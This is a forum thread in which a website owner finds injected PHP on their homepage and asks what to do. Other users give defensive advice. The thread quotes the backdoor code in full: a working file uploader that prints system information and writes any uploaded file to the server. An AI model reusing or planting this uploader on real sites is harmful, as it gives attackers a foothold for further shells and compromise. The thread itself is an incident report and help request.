My Website Hacked

today i found a wired php code on my homepage
the code as the following

<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully</b><br><br>'; }
    else { echo '<b>Upload Failed! </b><br><br>'; }
}
?>

Code (markup):

i don't know what i should do?
i have removed the code and is there anything else i should do?

 

Update your site to latest version if you are using any script, i would suggest as well to ask your provider to scan you site.

 

You should have to update your website and ask your webhost about this problem.

 

this code was just printed as a clean code it didn't show any upload form maybe the hacker injected that code to the page but it didn't show any form to upload files
anyawy i will check with my host about it..

 

Hi,

Change your passwords aswell as an extra precaution

Regards,
Adam

 

Yip, you've definitely had a hacking attempt.

http://www.devnetwork.net/viewtopic.php?f=34&t=132136

I think from further reading, it enables the hacker to upload a shell file directly to the server which obviously would have severe consequences if the server is not adequately secured. I'd strongly urge you to contact your host and alert them to this attempt.

 

i contacted them and they have made an AV scan and the server was clean

 

I don't think it was a virus, it was more a backdoor for the hacker to upload a shell file to the root of the server which wouldn't necessarily be picked up by an AV scan.

 

i'm new to server administration , is there a quick think i can do to check if the hacker shell file to the root of my server

 

I think your best bet is to contact whoever you rent it off and ask them what your next steps should be. Do you back your server up regularly? If so, make sure you take a local copy of the last backup before that hacking attempt just in case.